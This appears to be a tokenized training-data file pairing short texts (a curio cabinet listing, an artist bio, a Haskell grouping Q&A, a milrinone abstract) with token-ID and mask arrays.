1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Description A cappuccino finish graces this structurally interesting hexagon cabinet. The shape of this tower curio automatically brings attention to the singular items placed upon it's six glass shelves. This is a beautiful way to display your collectibles with canned lighting to highlight pieces when entertaining.
[ 1, 12953, 13, 13, 29909, 274, 932, 29884, 617, 1789, 8341, 2646, 778, 445, 2281, 332, 635, 8031, 15090, 12841, 28966, 29889, 450, 8267, 310, 445, 19372, 3151, 601, 6336, 23522, 8570, 304, 278, 13512, 4452, 7180, 2501, 372, 29915, 29879, 4832, 12917, 528, 295, 1960, 29889, 910, 338, 263, 9560, 982, 304, 2479, 596, 6314, 13876, 411, 508, 9571, 3578, 292, 304, 12141, 12785, 746, 22684, 292, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Payne G. (Chinese) Figurative Pop Art Artist From his first drawings to his university studies to now, Payne has focused solely on figurative compositions, employing gentle brushwork and soft colors for a naturalistic effect. He incorporates both representational and abstract expression to give his art a realistic impression with a modern appeal. Payne is best known for his iconic black and white Hollywood portraits and feminine figurative paintings. His models often have their backs turned, creating a sense of ambiguity in the private moment shared between subject and viewer. With his soft brushstrokes, he effectively conveys the tactile quality of a woman’s bare arm or the intangible feeling of time gone by. Already a well-known painter in Beijing and several major cities in China, Payne introduced his work to U.S. markets in 2010 with great reception. Each year the demand for his work increases, and his paintings can now be found in select fine art galleries and collections throughout the world.
[ 1, 14617, 484, 402, 29889, 313, 1451, 8233, 29897, 5104, 332, 1230, 6977, 3012, 3012, 391, 13, 13, 4591, 670, 937, 4216, 886, 304, 670, 16372, 11898, 304, 1286, 29892, 14617, 484, 756, 21309, 14419, 368, 373, 28477, 1230, 5541, 2187, 29892, 5703, 292, 9914, 1506, 1878, 1287, 322, 4964, 11955, 363, 263, 5613, 4695, 2779, 29889, 940, 11039, 1078, 1716, 2755, 1288, 322, 9846, 4603, 304, 2367, 670, 1616, 263, 1855, 4695, 17188, 411, 263, 5400, 25530, 29889, 13, 13, 15467, 484, 338, 1900, 2998, 363, 670, 9849, 293, 4628, 322, 4796, 19180, 2011, 336, 1169, 322, 21991, 457, 28477, 1230, 10675, 886, 29889, 3600, 4733, 4049, 505, 1009, 1250, 29879, 6077, 29892, 4969, 263, 4060, 310, 22363, 537, 297, 278, 2024, 3256, 7258, 1546, 4967, 322, 6316, 556, 29889, 2973, 670, 4964, 1506, 1878, 303, 307, 10794, 29892, 540, 17583, 378, 345, 952, 278, 28476, 488, 11029, 310, 263, 6114, 30010, 29879, 16079, 5075, 470, 278, 938, 574, 1821, 11223, 310, 931, 7695, 491, 29889, 13, 13, 2499, 2040, 263, 1532, 29899, 5203, 23187, 297, 1522, 823, 292, 322, 3196, 4655, 14368, 297, 7551, 29892, 14617, 484, 9129, 670, 664, 304, 501, 29889, 29903, 29889, 2791, 1691, 297, 29871, 29906, 29900, 29896, 29900, 411, 2107, 25647, 29889, 7806, 1629, 278, 9667, 363, 670, 664, 16415, 29892, 322, 670, 10675, 886, 508, 1286, 367, 1476, 297, 1831, 2691, 1616, 11798, 6358, 322, 16250, 10106, 278, 3186, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Q: Generating subtotals from a list of records I'm fetching a list of records from a webservice and generating reports based on that data. I'm currently using code similar to this: let sorted = sortBy (comparing field1 <> comparing field2) records let grouped = groupBy cmp sorted where cmp x y = (field1 x) == (field1 y) && (field2 x) == (field2 y) let subtotals = map subtot grouped where subtot = foldl1 recsum recsum x y = x { field3 = (field3 x) + (field3 y) } Is there a less verbose way to accomplish this? It gets a bit cluttery, especially when grouping by multiple fields. Even just having a single function for sort+group would help. I thought of writing a function taking a list of field deconstructors like sortAndGroup :: Ord v => [r -> v] -> [r] -> [[r]] but that won't work when the fields have different types. Any ideas? A: Instead of giving sortAndGroup a list of fields, let's give it a single function whose result will contain a tuple of those fields (or whatever else we need): import Control.Arrow ((&&&)) import Data.Function (on) import Data.Ord (comparing) import Data.List (groupBy, sortBy) sortAndGroup :: (Ord v) => (r -> v) -> [r] -> [[r]] sortAndGroup cf = groupBy (on (==) cf) . sortBy (comparing cf) Now we can easily sort and group a data type according to a set of fields: data Foo = Foo { field1 :: Int, field2 :: Int, field3 :: Int } deriving (Show, Eq, Ord) bar :: [Foo] -> [[Foo]] bar = sortAndGroup (\f -> (field1 f, field2 f)) Moreover, we can combine record accessors using (&&&) from Control.Arrow, specialized for -> (which is an instance of Arrow): -- Specialized for -> (&&&) ::: (b -> c) -> (b -> c') -> (b -> (c, c')) so bar can be shortened as bar' :: [Foo] -> [[Foo]] bar' = sortAndGroup (field1 &&& field2)
[ 1, 660, 29901, 13, 13, 5631, 1218, 1014, 4260, 1338, 515, 263, 1051, 310, 6475, 13, 13, 29902, 29915, 29885, 6699, 292, 263, 1051, 310, 6475, 515, 263, 1856, 5509, 322, 14655, 13676, 2729, 373, 393, 848, 29889, 306, 29915, 29885, 5279, 773, 775, 2788, 304, 445, 29901, 13, 1026, 12705, 353, 2656, 2059, 313, 510, 862, 292, 1746, 29896, 15271, 17420, 1746, 29906, 29897, 6475, 13, 1026, 27831, 353, 2318, 2059, 274, 1526, 12705, 13, 795, 988, 274, 1526, 921, 343, 353, 1678, 313, 2671, 29896, 921, 29897, 1275, 313, 2671, 29896, 343, 29897, 13, 462, 795, 2607, 313, 2671, 29906, 921, 29897, 1275, 313, 2671, 29906, 343, 29897, 13, 1026, 1014, 4260, 1338, 353, 2910, 1014, 4260, 27831, 13, 18884, 988, 1014, 4260, 353, 900, 11671, 29896, 1162, 2083, 13, 462, 418, 1162, 2083, 921, 343, 353, 921, 426, 1746, 29941, 353, 313, 2671, 29941, 921, 29897, 718, 313, 2671, 29941, 343, 29897, 500, 13, 13, 3624, 727, 263, 3109, 26952, 982, 304, 12709, 445, 29973, 739, 4947, 263, 2586, 1067, 6463, 29891, 29892, 7148, 746, 27270, 491, 2999, 4235, 29889, 7753, 925, 2534, 263, 2323, 740, 363, 2656, 29974, 2972, 723, 1371, 29889, 306, 2714, 310, 5007, 263, 740, 5622, 263, 1051, 310, 1746, 316, 11433, 943, 763, 13, 6605, 2855, 4782, 4761, 16557, 325, 1149, 518, 29878, 1599, 325, 29962, 1599, 518, 29878, 29962, 1599, 5519, 29878, 5262, 13, 13, 4187, 393, 2113, 29915, 29873, 664, 746, 278, 4235, 505, 1422, 4072, 29889, 3139, 7014, 29973, 13, 13, 29909, 29901, 13, 13, 3379, 1479, 310, 6820, 2656, 2855, 4782, 263, 1051, 310, 4235, 29892, 1235, 29915, 29879, 2367, 372, 263, 2323, 740, 5069, 1121, 674, 1712, 263, 18761, 310, 1906, 4235, 313, 272, 6514, 1683, 591, 817, 1125, 13, 5215, 11264, 29889, 1433, 798, 5135, 12774, 29987, 876, 13, 5215, 3630, 29889, 6678, 313, 265, 29897, 13, 5215, 3630, 29889, 23302, 313, 510, 862, 292, 29897, 13, 5215, 3630, 29889, 1293, 313, 2972, 2059, 29892, 2656, 2059, 29897, 13, 13, 6605, 2855, 4782, 4761, 313, 23302, 325, 29897, 1149, 313, 29878, 1599, 325, 29897, 1599, 518, 29878, 29962, 1599, 5519, 29878, 5262, 13, 6605, 2855, 4782, 274, 29888, 353, 2318, 2059, 313, 265, 313, 1360, 29897, 274, 29888, 29897, 869, 2656, 2059, 313, 510, 862, 292, 274, 29888, 29897, 13, 13, 10454, 591, 508, 5948, 2656, 322, 2318, 263, 848, 1134, 5034, 304, 263, 731, 310, 4235, 29901, 13, 1272, 13679, 353, 13679, 426, 1746, 29896, 4761, 3159, 29892, 1746, 29906, 4761, 3159, 29892, 1746, 29941, 4761, 3159, 500, 13, 29871, 589, 4357, 313, 8964, 29892, 12345, 29892, 16557, 29897, 13, 13, 1646, 4761, 518, 14016, 29962, 1599, 5519, 14016, 5262, 13, 1646, 353, 2656, 2855, 4782, 3441, 29888, 1599, 313, 2671, 29896, 285, 29892, 1746, 29906, 285, 876, 13, 13, 20761, 957, 29892, 591, 508, 14405, 2407, 2130, 943, 773, 313, 12774, 29987, 29897, 515, 11264, 29889, 1433, 798, 29892, 4266, 1891, 363, 1599, 313, 4716, 338, 385, 2777, 310, 826, 798, 1125, 13, 13, 489, 12630, 1891, 363, 1599, 13, 6243, 12774, 29897, 584, 1057, 313, 29890, 1599, 274, 29897, 1599, 313, 29890, 1599, 274, 1495, 1599, 313, 29890, 1599, 313, 29883, 29892, 274, 8785, 13, 13, 578, 2594, 508, 367, 3273, 6419, 408, 13, 1646, 29915, 4761, 518, 14016, 29962, 1599, 5519, 14016, 5262, 13, 1646, 29915, 353, 2656, 2855, 4782, 313, 2671, 29896, 2607, 29987, 1746, 29906, 29897, 13, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Phosphodiesterase III inhibitors: long-term risks and short-term benefits. Heart failure is now viewed as a disorder of the circulation, not merely the heart, which becomes manifest only when certain compensatory mechanisms break down. After treatment with diuretics, the two main strategies in treating heart failure involve decreasing the work of the heart by vasodilatation or increasing ventricular contractility by positive inotropic agents. It is now apparent, however, that the resulting hemodynamic benefit need not equate with long-term clinical improvement or increased longevity; indeed, the reverse can be true. Inhibitors of phosphodiesterase III, which is specific for the breakdown of cyclic adenosine monophosphate (cAMP), produce useful hemodynamic effects following intravenous and oral dosing, but have not fulfilled their initial promise in the chronic oral treatment of heart failure patients. The reason for reduced survival in the long-term studies of milrinone is not clear, but cardiac arrhythmias, possibly resulting from the increased intracellular levels of cAMP, may be responsible. However, intravenous usage may not suffer from the same limitations as chronic oral dosing. Short-term intravenous administration produces the expected beneficial hemodynamic effects of positive inotropism and vasodilatation. Though infusions of milrinone have been shown to enhance atrioventricular conduction in some, but not all, studies, there appears to be no significant increase in ventricular premature contractions, or ventricular or sustained tachyarrhythmias. Because milrinone does not have a significant adverse effect on His-Purkinje conduction, its use should be well tolerated in patients with intraventricular conduction disturbances. However, accurate assessment of the mortality risk and benefit of short-term intravenous treatment remains to be made in sufficiently powerful prospective, randomized controlled studies.(ABSTRACT TRUNCATED AT 250 WORDS)
[ 1, 1963, 25715, 12143, 4156, 559, 4786, 297, 6335, 17259, 29901, 1472, 29899, 8489, 5161, 2039, 322, 3273, 29899, 8489, 23633, 29889, 13, 3868, 442, 10672, 338, 1286, 24774, 408, 263, 766, 2098, 310, 278, 18342, 362, 29892, 451, 13586, 278, 5192, 29892, 607, 7415, 10419, 871, 746, 3058, 22874, 7606, 7208, 12903, 2867, 1623, 29889, 2860, 14502, 411, 652, 545, 29873, 1199, 29892, 278, 1023, 1667, 16650, 583, 297, 2578, 1218, 5192, 10672, 25135, 9263, 5832, 278, 664, 310, 278, 5192, 491, 19723, 397, 309, 271, 362, 470, 10231, 9712, 2200, 1070, 8078, 1793, 491, 6374, 297, 28467, 293, 19518, 29889, 739, 338, 1286, 20295, 29892, 3138, 29892, 393, 278, 9819, 9736, 397, 8739, 14169, 817, 451, 1592, 403, 411, 1472, 29899, 8489, 24899, 936, 20414, 470, 11664, 23123, 479, 17037, 29936, 6200, 29892, 278, 11837, 508, 367, 1565, 29889, 512, 6335, 17259, 310, 1374, 25715, 12143, 4156, 559, 4786, 29892, 607, 338, 2702, 363, 278, 2867, 3204, 310, 5094, 28746, 594, 264, 359, 457, 1601, 3021, 25715, 403, 313, 29883, 19297, 511, 7738, 5407, 9736, 397, 8739, 9545, 1494, 938, 336, 854, 681, 322, 470, 284, 3248, 292, 29892, 541, 505, 451, 6095, 26940, 1009, 2847, 11640, 297, 278, 17168, 293, 470, 284, 14502, 310, 5192, 10672, 22069, 29889, 450, 2769, 363, 12212, 10503, 2561, 297, 278, 1472, 29899, 8489, 11898, 310, 2316, 17056, 650, 338, 451, 2821, 29892, 541, 5881, 13544, 3948, 29882, 1541, 2460, 294, 29892, 10075, 9819, 515, 278, 11664, 938, 945, 514, 1070, 11174, 310, 274, 19297, 29892, 1122, 367, 14040, 29889, 2398, 29892, 938, 336, 854, 681, 8744, 1122, 451, 8812, 515, 278, 1021, 27028, 408, 17168, 293, 470, 284, 3248, 292, 29889, 13899, 29899, 8489, 938, 336, 854, 681, 17517, 13880, 278, 3806, 7795, 5611, 9736, 397, 8739, 9545, 310, 6374, 297, 28467, 1608, 322, 19723, 397, 309, 271, 362, 29889, 14832, 3041, 375, 1080, 310, 2316, 17056, 650, 505, 1063, 4318, 304, 26371, 749, 472, 374, 586, 296, 2200, 1070, 13417, 428, 297, 777, 29892, 541, 451, 599, 29892, 11898, 29892, 727, 5692, 304, 367, 694, 7282, 7910, 297, 9712, 2200, 1070, 5188, 1535, 6761, 1953, 29892, 470, 9712, 2200, 1070, 470, 15075, 7114, 260, 496, 29891, 2749, 29882, 1541, 2460, 294, 29889, 7311, 2316, 17056, 650, 947, 451, 505, 263, 7282, 594, 3901, 2779, 373, 3600, 29899, 29925, 332, 9089, 1324, 13417, 428, 29892, 967, 671, 881, 367, 1532, 20341, 630, 297, 22069, 411, 938, 336, 794, 2200, 1070, 13417, 428, 1320, 25006, 778, 29889, 2398, 29892, 16232, 24809, 358, 310, 278, 5758, 2877, 12045, 322, 14169, 310, 3273, 29899, 8489, 938, 336, 854, 681, 14502, 9242, 304, 367, 1754, 297, 18430, 13988, 10791, 12645, 29892, 4036, 1891, 20704, 11898, 14030, 2882, 1254, 4717, 1783, 10014, 3904, 29907, 3040, 29928, 15531, 29871, 29906, 29945, 29900, 399, 1955, 8452, 29897 ]
